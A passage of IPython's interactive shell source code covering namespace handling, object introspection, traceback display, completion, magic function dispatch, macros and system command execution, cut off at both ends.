del ns[varname]
except KeyError:
pass
else: # Delete by object
try:
obj = self.user_ns[varname]
except KeyError:
raise NameError("name '%s' is not defined" % varname)
# Also check in output history
ns_refs.append(self.history_manager.output_hist)
for ns in ns_refs:
to_delete = [n for n, o in ns.items() if o is obj]
for name in to_delete:
del ns[name]
# Ensure it is removed from the last execution result
if self.last_execution_result.result is obj:
self.last_execution_result = None
# displayhook keeps extra references, but not in a dictionary
for name in ('_', '__', '___'):
if getattr(self.displayhook, name) is obj:
setattr(self.displayhook, name, None)
def reset_selective(self, regex=None):
"""Clear selective variables from internal namespaces based on a
specified regular expression.
Parameters
----------
regex : string or compiled pattern, optional
A regular expression pattern that will be used in searching
variable names in the users namespaces.
"""
if regex is not None:
try:
m = re.compile(regex)
except TypeError:
raise TypeError('regex must be a string or compiled pattern')
# Search for keys in each namespace that match the given regex
# If a match is found, delete the key/value pair.
for ns in self.all_ns_refs:
for var in ns:
if m.search(var):
del ns[var]
def push(self, variables, interactive=True):
"""Inject a group of variables into the IPython user namespace.
Parameters
----------
variables : dict, str or list/tuple of str
The variables to inject into the user's namespace. If a dict, a
simple update is done. If a str, the string is assumed to have
variable names separated by spaces. A list/tuple of str can also
be used to give the variable names. If just the variable names are
give (list/tuple/str) then the variable values looked up in the
callers frame.
interactive : bool
If True (default), the variables will be listed with the ``who``
magic.
"""
vdict = None
# We need a dict of name/value pairs to do namespace updates.
if isinstance(variables, dict):
vdict = variables
elif isinstance(variables, (str, list, tuple)):
if isinstance(variables, str):
vlist = variables.split()
else:
vlist = variables
vdict = {}
cf = sys._getframe(1)
for name in vlist:
try:
vdict[name] = eval(name, cf.f_globals, cf.f_locals)
except:
print('Could not get variable %s from %s' %
(name,cf.f_code.co_name))
else:
raise ValueError('variables must be a dict/str/list/tuple')
# Propagate variables to user namespace
self.user_ns.update(vdict)
# And configure interactive visibility
user_ns_hidden = self.user_ns_hidden
if interactive:
for name in vdict:
user_ns_hidden.pop(name, None)
else:
user_ns_hidden.update(vdict)
def drop_by_id(self, variables):
"""Remove a dict of variables from the user namespace, if they are the
same as the values in the dictionary.
This is intended for use by extensions: variables that they've added can
be taken back out if they are unloaded, without removing any that the
user has overwritten.
Parameters
----------
variables : dict
A dictionary mapping object names (as strings) to the objects.
"""
for name, obj in variables.items():
if name in self.user_ns and self.user_ns[name] is obj:
del self.user_ns[name]
self.user_ns_hidden.pop(name, None)
#-------------------------------------------------------------------------
# Things related to object introspection
#-------------------------------------------------------------------------
def _ofind(self, oname, namespaces=None):
"""Find an object in the available namespaces.
self._ofind(oname) -> dict with keys: found,obj,ospace,ismagic
Has special code to detect magic functions.
"""
oname = oname.strip()
if not oname.startswith(ESC_MAGIC) and \
not oname.startswith(ESC_MAGIC2) and \
not all(a.isidentifier() for a in oname.split(".")):
return {'found': False}
if namespaces is None:
# Namespaces to search in:
# Put them in a list. The order is important so that we
# find things in the same order that Python finds them.
namespaces = [ ('Interactive', self.user_ns),
('Interactive (global)', self.user_global_ns),
('Python builtin', builtin_mod.__dict__),
]
ismagic = False
isalias = False
found = False
ospace = None
parent = None
obj = None
# Look for the given name by splitting it in parts. If the head is
# found, then we look for all the remaining parts as members, and only
# declare success if we can find them all.
oname_parts = oname.split('.')
oname_head, oname_rest = oname_parts[0],oname_parts[1:]
for nsname,ns in namespaces:
try:
obj = ns[oname_head]
except KeyError:
continue
else:
for idx, part in enumerate(oname_rest):
try:
parent = obj
# The last part is looked up in a special way to avoid
# descriptor invocation as it may raise or have side
# effects.
if idx == len(oname_rest) - 1:
obj = self._getattr_property(obj, part)
else:
obj = getattr(obj, part)
except:
# Blanket except b/c some badly implemented objects
# allow __getattr__ to raise exceptions other than
# AttributeError, which then crashes IPython.
break
else:
# If we finish the for loop (no break), we got all members
found = True
ospace = nsname
break # namespace loop
# Try to see if it's magic
if not found:
obj = None
if oname.startswith(ESC_MAGIC2):
oname = oname.lstrip(ESC_MAGIC2)
obj = self.find_cell_magic(oname)
elif oname.startswith(ESC_MAGIC):
oname = oname.lstrip(ESC_MAGIC)
obj = self.find_line_magic(oname)
else:
# search without prefix, so run? will find %run?
obj = self.find_line_magic(oname)
if obj is None:
obj = self.find_cell_magic(oname)
if obj is not None:
found = True
ospace = 'IPython internal'
ismagic = True
isalias = isinstance(obj, Alias)
# Last try: special-case some literals like '', [], {}, etc:
if not found and oname_head in ["''",'""','[]','{}','()']:
obj = eval(oname_head)
found = True
ospace = 'Interactive'
return {
'obj':obj,
'found':found,
'parent':parent,
'ismagic':ismagic,
'isalias':isalias,
'namespace':ospace
}
@staticmethod
def _getattr_property(obj, attrname):
"""Property-aware getattr to use in object finding.
If attrname represents a property, return it unevaluated (in case it has
side effects or raises an error.
"""
if not isinstance(obj, type):
try:
# `getattr(type(obj), attrname)` is not guaranteed to return
# `obj`, but does so for property:
#
# property.__get__(self, None, cls) -> self
#
# The universal alternative is to traverse the mro manually
# searching for attrname in class dicts.
attr = getattr(type(obj), attrname)
except AttributeError:
pass
else:
# This relies on the fact that data descriptors (with both
# __get__ & __set__ magic methods) take precedence over
# instance-level attributes:
#
# class A(object):
# @property
# def foobar(self): return 123
# a = A()
# a.__dict__['foobar'] = 345
# a.foobar # == 123
#
# So, a property may be returned right away.
if isinstance(attr, property):
return attr
# Nothing helped, fall back.
return getattr(obj, attrname)
def _object_find(self, oname, namespaces=None):
"""Find an object and return a struct with info about it."""
return Struct(self._ofind(oname, namespaces))
def _inspect(self, meth, oname, namespaces=None, **kw):
"""Generic interface to the inspector system.
This function is meant to be called by pdef, pdoc & friends.
"""
info = self._object_find(oname, namespaces)
docformat = sphinxify if self.sphinxify_docstring else None
if info.found:
pmethod = getattr(self.inspector, meth)
# TODO: only apply format_screen to the plain/text repr of the mime
# bundle.
formatter = format_screen if info.ismagic else docformat
if meth == 'pdoc':
pmethod(info.obj, oname, formatter)
elif meth == 'pinfo':
pmethod(
info.obj,
oname,
formatter,
info,
enable_html_pager=self.enable_html_pager,
**kw
)
else:
pmethod(info.obj, oname)
else:
print('Object `%s` not found.' % oname)
return 'not found' # so callers can take other action
def object_inspect(self, oname, detail_level=0):
"""Get object info about oname"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector.info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
return oinspect.object_info(name=oname, found=False)
def object_inspect_text(self, oname, detail_level=0):
"""Get object info as formatted text"""
return self.object_inspect_mime(oname, detail_level)['text/plain']
def object_inspect_mime(self, oname, detail_level=0):
"""Get object info as a mimebundle of formatted representations.
A mimebundle is a dictionary, keyed by mime-type.
It must always have the key `'text/plain'`.
"""
with self.builtin_trap:
info = self._object_find(oname)
if info.found:
return self.inspector._get_info(info.obj, oname, info=info,
detail_level=detail_level
)
else:
raise KeyError(oname)
#-------------------------------------------------------------------------
# Things related to history management
#-------------------------------------------------------------------------
def init_history(self):
"""Sets up the command history, and starts regular autosaves."""
self.history_manager = HistoryManager(shell=self, parent=self)
self.configurables.append(self.history_manager)
#-------------------------------------------------------------------------
# Things related to exception handling and tracebacks (not debugging)
#-------------------------------------------------------------------------
debugger_cls = Pdb
def init_traceback_handlers(self, custom_exceptions):
# Syntax error handler.
self.SyntaxTB = ultratb.SyntaxTB(color_scheme='NoColor', parent=self)
# The interactive one is initialized with an offset, meaning we always
# want to remove the topmost item in the traceback, which is our own
# internal code. Valid modes: ['Plain','Context','Verbose','Minimal']
self.InteractiveTB = ultratb.AutoFormattedTB(mode = 'Plain',
color_scheme='NoColor',
tb_offset = 1,
check_cache=check_linecache_ipython,
debugger_cls=self.debugger_cls, parent=self)
# The instance will store a pointer to the system-wide exception hook,
# so that runtime code (such as magics) can access it. This is because
# during the read-eval loop, it may get temporarily overwritten.
self.sys_excepthook = sys.excepthook
# and add any custom exception handlers the user may have specified
self.set_custom_exc(*custom_exceptions)
# Set the exception mode
self.InteractiveTB.set_mode(mode=self.xmode)
def set_custom_exc(self, exc_tuple, handler):
"""set_custom_exc(exc_tuple, handler)
Set a custom exception handler, which will be called if any of the
exceptions in exc_tuple occur in the mainloop (specifically, in the
run_code() method).
Parameters
----------
exc_tuple : tuple of exception classes
A *tuple* of exception classes, for which to call the defined
handler. It is very important that you use a tuple, and NOT A
LIST here, because of the way Python's except statement works. If
you only want to trap a single exception, use a singleton tuple::
exc_tuple == (MyCustomException,)
handler : callable
handler must have the following signature::
def my_handler(self, etype, value, tb, tb_offset=None):
...
return structured_traceback
Your handler must return a structured traceback (a list of strings),
or None.
This will be made into an instance method (via types.MethodType)
of IPython itself, and it will be called if any of the exceptions
listed in the exc_tuple are caught. If the handler is None, an
internal basic one is used, which just prints basic info.
To protect IPython from crashes, if your handler ever raises an
exception or returns an invalid result, it will be immediately
disabled.
WARNING: by putting in your own exception handler into IPython's main
execution loop, you run a very good chance of nasty crashes. This
facility should only be used if you really know what you are doing."""
if not isinstance(exc_tuple, tuple):
raise TypeError("The custom exceptions must be given as a tuple.")
def dummy_handler(self, etype, value, tb, tb_offset=None):
print('*** Simple custom exception handler ***')
print('Exception type :', etype)
print('Exception value:', value)
print('Traceback :', tb)
def validate_stb(stb):
"""validate structured traceback return type
return type of CustomTB *should* be a list of strings, but allow
single strings or None, which are harmless.
This function will *always* return a list of strings,
and will raise a TypeError if stb is inappropriate.
"""
msg = "CustomTB must return list of strings, not %r" % stb
if stb is None:
return []
elif isinstance(stb, str):
return [stb]
elif not isinstance(stb, list):
raise TypeError(msg)
# it's a list
for line in stb:
# check every element
if not isinstance(line, str):
raise TypeError(msg)
return stb
if handler is None:
wrapped = dummy_handler
else:
def wrapped(self,etype,value,tb,tb_offset=None):
"""wrap CustomTB handler, to protect IPython from user code
This makes it harder (but not impossible) for custom exception
handlers to crash IPython.
"""
try:
stb = handler(self,etype,value,tb,tb_offset=tb_offset)
return validate_stb(stb)
except:
# clear custom handler immediately
self.set_custom_exc((), None)
print("Custom TB Handler failed, unregistering", file=sys.stderr)
# show the exception in handler first
stb = self.InteractiveTB.structured_traceback(*sys.exc_info())
print(self.InteractiveTB.stb2text(stb))
print("The original exception:")
stb = self.InteractiveTB.structured_traceback(
(etype,value,tb), tb_offset=tb_offset
)
return stb
self.CustomTB = types.MethodType(wrapped,self)
self.custom_exceptions = exc_tuple
def excepthook(self, etype, value, tb):
"""One more defense for GUI apps that call sys.excepthook.
GUI frameworks like wxPython trap exceptions and call
sys.excepthook themselves. I guess this is a feature that
enables them to keep running after exceptions that would
otherwise kill their mainloop. This is a bother for IPython
which excepts to catch all of the program exceptions with a try:
except: statement.
Normally, IPython sets sys.excepthook to a CrashHandler instance, so if
any app directly invokes sys.excepthook, it will look to the user like
IPython crashed. In order to work around this, we can disable the
CrashHandler and replace it with this excepthook instead, which prints a
regular traceback using our InteractiveTB. In this fashion, apps which
call sys.excepthook will generate a regular-looking exception from
IPython, and the CrashHandler will only be triggered by real IPython
crashes.
This hook should be used sparingly, only in places which are not likely
to be true IPython errors.
"""
self.showtraceback((etype, value, tb), tb_offset=0)
def _get_exc_info(self, exc_tuple=None):
"""get exc_info from a given tuple, sys.exc_info() or sys.last_type etc.
Ensures sys.last_type,value,traceback hold the exc_info we found,
from whichever source.
raises ValueError if none of these contain any information
"""
if exc_tuple is None:
etype, value, tb = sys.exc_info()
else:
etype, value, tb = exc_tuple
if etype is None:
if hasattr(sys, 'last_type'):
etype, value, tb = sys.last_type, sys.last_value, \
sys.last_traceback
if etype is None:
raise ValueError("No exception to find")
# Now store the exception info in sys.last_type etc.
# WARNING: these variables are somewhat deprecated and not
# necessarily safe to use in a threaded environment, but tools
# like pdb depend on their existence, so let's set them. If we
# find problems in the field, we'll need to revisit their use.
sys.last_type = etype
sys.last_value = value
sys.last_traceback = tb
return etype, value, tb
def show_usage_error(self, exc):
"""Show a short message for UsageErrors
These are special exceptions that shouldn't show a traceback.
"""
print("UsageError: %s" % exc, file=sys.stderr)
def get_exception_only(self, exc_tuple=None):
"""
Return as a string (ending with a newline) the exception that
just occurred, without any traceback.
"""
etype, value, tb = self._get_exc_info(exc_tuple)
msg = traceback.format_exception_only(etype, value)
return ''.join(msg)
def showtraceback(self, exc_tuple=None, filename=None, tb_offset=None,
exception_only=False, running_compiled_code=False):
"""Display the exception that just occurred.
If nothing is known about the exception, this is the method which
should be used throughout the code for presenting user tracebacks,
rather than directly invoking the InteractiveTB object.
A specific showsyntaxerror() also exists, but this method can take
care of calling it if needed, so unless you are explicitly catching a
SyntaxError exception, don't try to analyze the stack manually and
simply call this method."""
try:
try:
etype, value, tb = self._get_exc_info(exc_tuple)
except ValueError:
print('No traceback available to show.', file=sys.stderr)
return
if issubclass(etype, SyntaxError):
# Though this won't be called by syntax errors in the input
# line, there may be SyntaxError cases with imported code.
self.showsyntaxerror(filename, running_compiled_code)
elif etype is UsageError:
self.show_usage_error(value)
else:
if exception_only:
stb = ['An exception has occurred, use %tb to see '
'the full traceback.\n']
stb.extend(self.InteractiveTB.get_exception_only(etype,
value))
else:
try:
# Exception classes can customise their traceback - we
# use this in IPython.parallel for exceptions occurring
# in the engines. This should return a list of strings.
stb = value._render_traceback_()
except Exception:
stb = self.InteractiveTB.structured_traceback(etype,
value, tb, tb_offset=tb_offset)
self._showtraceback(etype, value, stb)
if self.call_pdb:
# drop into debugger
self.debugger(force=True)
return
# Actually show the traceback
self._showtraceback(etype, value, stb)
except KeyboardInterrupt:
print('\n' + self.get_exception_only(), file=sys.stderr)
def _showtraceback(self, etype, evalue, stb):
"""Actually show a traceback.
Subclasses may override this method to put the traceback on a different
place, like a side channel.
"""
print(self.InteractiveTB.stb2text(stb))
def showsyntaxerror(self, filename=None, running_compiled_code=False):
"""Display the syntax error that just occurred.
This doesn't display a stack trace because there isn't one.
If a filename is given, it is stuffed in the exception instead
of what was there before (because Python's parser always uses
"<string>" when reading from a string).
If the syntax error occurred when running a compiled code (i.e. running_compile_code=True),
longer stack trace will be displayed.
"""
etype, value, last_traceback = self._get_exc_info()
if filename and issubclass(etype, SyntaxError):
try:
value.filename = filename
except:
# Not the format we expect; leave it alone
pass
# If the error occurred when executing compiled code, we should provide full stacktrace.
elist = traceback.extract_tb(last_traceback) if running_compiled_code else []
stb = self.SyntaxTB.structured_traceback(etype, value, elist)
self._showtraceback(etype, value, stb)
# This is overridden in TerminalInteractiveShell to show a message about
# the %paste magic.
def showindentationerror(self):
"""Called by _run_cell when there's an IndentationError in code entered
at the prompt.
This is overridden in TerminalInteractiveShell to show a message about
the %paste magic."""
self.showsyntaxerror()
#-------------------------------------------------------------------------
# Things related to readline
#-------------------------------------------------------------------------
def init_readline(self):
"""DEPRECATED
Moved to terminal subclass, here only to simplify the init logic."""
# Set a number of methods that depend on readline to be no-op
warnings.warn('`init_readline` is no-op since IPython 5.0 and is Deprecated',
DeprecationWarning, stacklevel=2)
self.set_custom_completer = no_op
@skip_doctest
def set_next_input(self, s, replace=False):
""" Sets the 'default' input string for the next command line.
Example::
In [1]: _ip.set_next_input("Hello Word")
In [2]: Hello Word_ # cursor is here
"""
self.rl_next_input = s
def _indent_current_str(self):
"""return the current level of indentation as a string"""
return self.input_splitter.get_indent_spaces() * ' '
#-------------------------------------------------------------------------
# Things related to text completion
#-------------------------------------------------------------------------
def init_completer(self):
"""Initialize the completion machinery.
This creates completion machinery that can be used by client code,
either interactively in-process (typically triggered by the readline
library), programmatically (such as in test suites) or out-of-process
(typically over the network by remote frontends).
"""
from IPython.core.completer import IPCompleter
from IPython.core.completerlib import (module_completer,
magic_run_completer, cd_completer, reset_completer)
self.Completer = IPCompleter(shell=self,
namespace=self.user_ns,
global_namespace=self.user_global_ns,
parent=self,
)
self.configurables.append(self.Completer)
# Add custom completers to the basic ones built into IPCompleter
sdisp = self.strdispatchers.get('complete_command', StrDispatch())
self.strdispatchers['complete_command'] = sdisp
self.Completer.custom_completers = sdisp
self.set_hook('complete_command', module_completer, str_key = 'import')
self.set_hook('complete_command', module_completer, str_key = 'from')
self.set_hook('complete_command', module_completer, str_key = '%aimport')
self.set_hook('complete_command', magic_run_completer, str_key = '%run')
self.set_hook('complete_command', cd_completer, str_key = '%cd')
self.set_hook('complete_command', reset_completer, str_key = '%reset')
@skip_doctest
def complete(self, text, line=None, cursor_pos=None):
"""Return the completed text and a list of completions.
Parameters
----------
text : string
A string of text to be completed on. It can be given as empty and
instead a line/position pair are given. In this case, the
completer itself will split the line like readline does.
line : string, optional
The complete line that text is part of.
cursor_pos : int, optional
The position of the cursor on the input line.
Returns
-------
text : string
The actual text that was completed.
matches : list
A sorted list with all possible completions.
The optional arguments allow the completion to take more context into
account, and are part of the low-level completion API.
This is a wrapper around the completion mechanism, similar to what
readline does at the command line when the TAB key is hit. By
exposing it as a method, it can be used by other non-readline
environments (such as GUIs) for text completion.
Simple usage example:
In [1]: x = 'hello'
In [2]: _ip.complete('x.l')
Out[2]: ('x.l', ['x.ljust', 'x.lower', 'x.lstrip'])
"""
# Inject names into __builtin__ so we can complete on the added names.
with self.builtin_trap:
return self.Completer.complete(text, line, cursor_pos)
def set_custom_completer(self, completer, pos=0) -> None:
"""Adds a new custom completer function.
The position argument (defaults to 0) is the index in the completers
list where you want the completer to be inserted.
`completer` should have the following signature::
def completion(self: Completer, text: string) -> List[str]:
raise NotImplementedError
It will be bound to the current Completer instance and pass some text
and return a list with current completions to suggest to the user.
"""
newcomp = types.MethodType(completer, self.Completer)
self.Completer.custom_matchers.insert(pos,newcomp)
def set_completer_frame(self, frame=None):
"""Set the frame of the completer."""
if frame:
self.Completer.namespace = frame.f_locals
self.Completer.global_namespace = frame.f_globals
else:
self.Completer.namespace = self.user_ns
self.Completer.global_namespace = self.user_global_ns
#-------------------------------------------------------------------------
# Things related to magics
#-------------------------------------------------------------------------
def init_magics(self):
from IPython.core import magics as m
self.magics_manager = magic.MagicsManager(shell=self,
parent=self,
user_magics=m.UserMagics(self))
self.configurables.append(self.magics_manager)
# Expose as public API from the magics manager
self.register_magics = self.magics_manager.register
self.register_magics(m.AutoMagics, m.BasicMagics, m.CodeMagics,
m.ConfigMagics, m.DisplayMagics, m.ExecutionMagics,
m.ExtensionMagics, m.HistoryMagics, m.LoggingMagics,
m.NamespaceMagics, m.OSMagics, m.PackagingMagics,
m.PylabMagics, m.ScriptMagics,
)
self.register_magics(m.AsyncMagics)
# Register Magic Aliases
mman = self.magics_manager
# FIXME: magic aliases should be defined by the Magics classes
# or in MagicsManager, not here
mman.register_alias('ed', 'edit')
mman.register_alias('hist', 'history')
mman.register_alias('rep', 'recall')
mman.register_alias('SVG', 'svg', 'cell')
mman.register_alias('HTML', 'html', 'cell')
mman.register_alias('file', 'writefile', 'cell')
# FIXME: Move the color initialization to the DisplayHook, which
# should be split into a prompt manager and displayhook. We probably
# even need a centralize colors management object.
self.run_line_magic('colors', self.colors)
# Defined here so that it's included in the documentation
@functools.wraps(magic.MagicsManager.register_function)
def register_magic_function(self, func, magic_kind='line', magic_name=None):
self.magics_manager.register_function(
func, magic_kind=magic_kind, magic_name=magic_name
)
def run_line_magic(self, magic_name, line, _stack_depth=1):
"""Execute the given line magic.
Parameters
----------
magic_name : str
Name of the desired magic function, without '%' prefix.
line : str
The rest of the input line as a single string.
_stack_depth : int
If run_line_magic() is called from magic() then _stack_depth=2.
This is added to ensure backward compatibility for use of 'get_ipython().magic()'
"""
fn = self.find_line_magic(magic_name)
if fn is None:
cm = self.find_cell_magic(magic_name)
etpl = "Line magic function `%%%s` not found%s."
extra = '' if cm is None else (' (But cell magic `%%%%%s` exists, '
'did you mean that instead?)' % magic_name )
raise UsageError(etpl % (magic_name, extra))
else:
# Note: this is the distance in the stack to the user's frame.
# This will need to be updated if the internal calling logic gets
# refactored, or else we'll be expanding the wrong variables.
# Determine stack_depth depending on where run_line_magic() has been called
stack_depth = _stack_depth
if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
# magic has opted out of var_expand
magic_arg_s = line
else:
magic_arg_s = self.var_expand(line, stack_depth)
# Put magic args in a list so we can call with f(*a) syntax
args = [magic_arg_s]
kwargs = {}
# Grab local namespace if we need it:
if getattr(fn, "needs_local_scope", False):
kwargs['local_ns'] = self.get_local_scope(stack_depth)
with self.builtin_trap:
result = fn(*args, **kwargs)
return result
def get_local_scope(self, stack_depth):
"""Get local scope at given stack depth.
Parameters
----------
stack_depth : int
Depth relative to calling frame
"""
return sys._getframe(stack_depth + 1).f_locals
def run_cell_magic(self, magic_name, line, cell):
"""Execute the given cell magic.
Parameters
----------
magic_name : str
Name of the desired magic function, without '%' prefix.
line : str
The rest of the first input line as a single string.
cell : str
The body of the cell as a (possibly multiline) string.
"""
fn = self.find_cell_magic(magic_name)
if fn is None:
lm = self.find_line_magic(magic_name)
etpl = "Cell magic `%%{0}` not found{1}."
extra = '' if lm is None else (' (But line magic `%{0}` exists, '
'did you mean that instead?)'.format(magic_name))
raise UsageError(etpl.format(magic_name, extra))
elif cell == '':
message = '%%{0} is a cell magic, but the cell body is empty.'.format(magic_name)
if self.find_line_magic(magic_name) is not None:
message += ' Did you mean the line magic %{0} (single %)?'.format(magic_name)
raise UsageError(message)
else:
# Note: this is the distance in the stack to the user's frame.
# This will need to be updated if the internal calling logic gets
# refactored, or else we'll be expanding the wrong variables.
stack_depth = 2
if getattr(fn, magic.MAGIC_NO_VAR_EXPAND_ATTR, False):
# magic has opted out of var_expand
magic_arg_s = line
else:
magic_arg_s = self.var_expand(line, stack_depth)
kwargs = {}
if getattr(fn, "needs_local_scope", False):
kwargs['local_ns'] = self.user_ns
with self.builtin_trap:
args = (magic_arg_s, cell)
result = fn(*args, **kwargs)
return result
def find_line_magic(self, magic_name):
"""Find and return a line magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['line'].get(magic_name)
def find_cell_magic(self, magic_name):
"""Find and return a cell magic by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics['cell'].get(magic_name)
def find_magic(self, magic_name, magic_kind='line'):
"""Find and return a magic of the given type by name.
Returns None if the magic isn't found."""
return self.magics_manager.magics[magic_kind].get(magic_name)
def magic(self, arg_s):
"""DEPRECATED. Use run_line_magic() instead.
Call a magic function by name.
Input: a string containing the name of the magic function to call and
any additional arguments to be passed to the magic.
magic('name -opt foo bar') is equivalent to typing at the ipython
prompt:
In[1]: %name -opt foo bar
To call a magic without arguments, simply use magic('name').
This provides a proper Python function to call IPython's magics in any
valid Python code you can type at the interpreter, including loops and
compound statements.
"""
# TODO: should we issue a loud deprecation warning here?
magic_name, _, magic_arg_s = arg_s.partition(' ')
magic_name = magic_name.lstrip(prefilter.ESC_MAGIC)
return self.run_line_magic(magic_name, magic_arg_s, _stack_depth=2)
#-------------------------------------------------------------------------
# Things related to macros
#-------------------------------------------------------------------------
def define_macro(self, name, themacro):
"""Define a new macro
Parameters
----------
name : str
The name of the macro.
themacro : str or Macro
The action to do upon invoking the macro. If a string, a new
Macro object is created by passing the string to it.
"""
from IPython.core import macro
if isinstance(themacro, str):
themacro = macro.Macro(themacro)
if not isinstance(themacro, macro.Macro):
raise ValueError('A macro must be a string or a Macro instance.')
self.user_ns[name] = themacro
#-------------------------------------------------------------------------
# Things related to the running of system commands
#-------------------------------------------------------------------------
def system_piped(self, cmd):
"""Call the given cmd in a subprocess, piping stdout/err
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported. Should not be a command that expects input
other than simple text.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
# We do not support backgrounding processes because we either use
# pexpect or pipes to read from. Users can always just call
# os.system() or use ip.system=ip.system_raw
# if they really want a background process.
raise OSError("Background processes not supported.")
# we explicitly do NOT return the subprocess status code, because
# a non-None value would trigger :func:`sys.displayhook` calls.
# Instead, we store the exit_code in user_ns.
self.user_ns['_exit_code'] = system(self.var_expand(cmd, depth=1))
def system_raw(self, cmd):
"""Call the given cmd in a subprocess using os.system on Windows or
subprocess.call using the system shell on other platforms.
Parameters
----------
cmd : str
Command to execute.
"""
cmd = self.var_expand(cmd, depth=1)
# protect os.system from UNC paths on Windows, which it can't handle:
if sys.platform == 'win32':
from IPython.utils._process_win32 import AvoidUNCPath
with AvoidUNCPath() as path:
if path is not None:
cmd = '"pushd %s &&"%s' % (path, cmd)
try:
ec = os.system(cmd)
except KeyboardInterrupt:
print('\n' + self.get_exception_only(), file=sys.stderr)
ec = -2
else:
# For posix the result of the subprocess.call() below is an exit
# code, which by convention is zero for success, positive for
# program failure. Exit codes above 128 are reserved for signals,
# and the formula for converting a signal to an exit code is usually
# signal_number+128. To more easily differentiate between exit
# codes and signals, ipython uses negative numbers. For instance
# since control-c is signal 2 but exit code 130, ipython's
# _exit_code variable will read -2. Note that some shells like
# csh and fish don't follow sh/bash conventions for exit codes.
executable = os.environ.get('SHELL', None)
try:
# Use env shell instead of default /bin/sh
ec = subprocess.call(cmd, shell=True, executable=executable)
except KeyboardInterrupt:
# intercept control-C; a long traceback is not useful here
print('\n' + self.get_exception_only(), file=sys.stderr)
ec = 130
if ec > 128:
ec = -(ec - 128)
# We explicitly do NOT return the subprocess status code, because
# a non-None value would trigger :func:`sys.displayhook` calls.
# Instead, we store the exit_code in user_ns. Note the semantics
# of _exit_code: for control-c, _exit_code == -signal.SIGNIT,
# but raising SystemExit(_exit_code) will give status 254!
self.user_ns['_exit_code'] = ec
# use piped system by default, because it is better behaved
system = system_piped
def getoutput(self, cmd, split=True, depth=0):
"""Get output (possibly including stderr) from a subprocess.
Parameters
----------
cmd : str
Command to execute (can not end in '&', as background processes are
not supported.
split : bool, optional
If True, split the output into an IPython SList. Otherwise, an
IPython LSString is returned. These are objects similar to normal
lists and strings, with a few convenience attributes for easier
manipulation of line-based output. You can use '?' on them for
details.
depth : int, optional
How many frames above the caller are the local variables which should
be expanded in the command string? The default (0) assumes that the
expansion variables are in the stack frame calling this function.
"""
if cmd.rstrip().endswith('&'):
# this is *far* from a rigorous test
raise OSError("Background processes not supported.")
out = getoutput(self.var_expand(cmd, depth=depth+1))
if split:
out = SList(out.splitlines())
else:
out = LSString(out)
return out
#-------------------------------------------------------------------------
# Things related to aliases
#-------------------------------------------------------------------------
def init_alias(self):
self.alias_manager = AliasManager(shell=self, parent=self)
self.configurables.append(self.alias_manager)
#-------------------------------------------------------------------------
# Things related to extensions
#-------------------------------------------------------------------------
def init_extension_manager(self):
self.extension_manager = ExtensionManager(shell=self, parent=self)
self.configurables.append(self.extension_manager)
#-------------------------------------------------------------------------
# Things related to payloads
#-------------------------------------------------------------------------
def init_payload(self):
self.payload_manager = PayloadManager(parent=self)
self.configurables.append(self.payload_manager)
#-------------------------------------------------------------------------
# Things related to the prefilter
#-------------------------------------------------------------------------
def init_prefilter(self):
self.prefilter_manager = PrefilterManager(shell=self, parent=self)
self.configurables.append(self.prefilter_manager)
# Ultimately this will be refactored in the new interpreter code, but
# for now, we should expose the main prefilter method (there's legacy
# code out there that may rely on this).
self.prefilter = self.prefilter_manager.prefilter_lines
def auto_rewrite_input(self, cmd):
"""Print to the screen the rewritten form of the user's command.
This shows visual feedback by rewriting input lines that cause
automatic calling to kick in, like::
/f x
into::
------> f(x)
after the user's input prompt. This helps the user understand that the
input line was transformed automatically by IPython.
"""
if not self.show_rewritten_input:
return
# This is overridden in TerminalInteractiveShell to use fancy prompts
print("------> " + cmd)
#-------------------------------------------------------------------------
# Things related to extracting values/expressions from kernel and user_ns
#-------------------------------------------------------------------------
def _user_obj_error(self):
"""return simple exception dict
for use in user_expressions
"""
etype, evalue, tb = self._get_exc_info()
stb = self.InteractiveTB.get_exception_only(etype, evalue)
exc_info = {
u'status' : 'error',
u'traceback' : stb,
u'ename' : etype.__name__,
u'evalue' : py3compat.safe_unicode(evalue),
}
return exc_info
def _format_user_obj(self, obj):
"""format a user object to display dict
for use in user_expressions
"""
data, md = self.display_formatter.format(obj)
value = {
'status' : 'ok',
'data' : data,
'metadata' : md,
}
return value
def user_expressions(self, expressions):
"""Evaluate a dict of expressions in the user's namespace.
Parameters
----------
expressions : dict
A dict with string keys and string values. The expression values
should be valid Python expressions, each of which will be evaluated
in the user namespace.
Returns
-------
A dict, keyed like the input expressions dict, with the rich mime-typed
display_data of each value.
"""
out = {}
user_ns = self.user_ns
global_ns = self.user_global_ns
for key, expr in expressions.items():
try:
value = self._format_user_obj(eval(expr, global_ns, user_ns))
except:
value = self._user_obj_error()
out[key] = value
return out
#-------------------------------------------------------------------------
# Things related to the running of code
#-------------------------------------------------------------------------
def ex(self, cmd):
"""Execute a normal python statement in user namespace."""
with self.builtin_trap:
exec(cmd, self.user_global_ns, self.user_ns)
def ev(self, expr):
"""Evaluate python expression expr in user namespace.
Returns the result of evaluation
"""
with self.builtin_trap:
return eval(expr, self.user_global_ns, self.user_ns)
def safe_execfile(self, fname, *where, exit_ignore=False, raise_exceptions=False, shell_futures=False):
"""A safe version of the builtin execfile().
This version will never throw an exception, but instead print
helpful error messages to the screen. This only works on pure
Python files with the .py extension.
Parameters
----------
fname : string
The name of the file to be executed.
where : tuple
One or two namespaces, passed to execfile() as (globals,locals).
If only one is given, it is passed as both.
exit_ignore : bool (False)
If True, then silence SystemExit for non-zero status (it is always
silenced for zero status, as it is so common).
raise_exceptions : bool (False)
If True raise exceptions everywhere. Meant for testing.
shell_futures : bool (False)
If True, the code will share future statements with the interactive
shell. It will both be affected by previous __future__ imports, and
any __future__ imports in the code will affect the shell. If False,
__future__ imports are not shared in either direction.
"""
fname = os.path.abspath(os.path.expanduser(fname))
# Make sure we can open the file
try:
with open(fname):
pass
except:
warn('Could not open file <%s> for safe execution.' % fname)
return
# Find things also in current directory. This is needed to mimic the
# behavior of running a script from the system command line, where
# Python inserts the script's directory into sys.path
dname = os.path.dirname(fname)
with prepended_to_syspath(dname), self.builtin_trap:
try:
glob, loc = (where + (None, ))[:2]
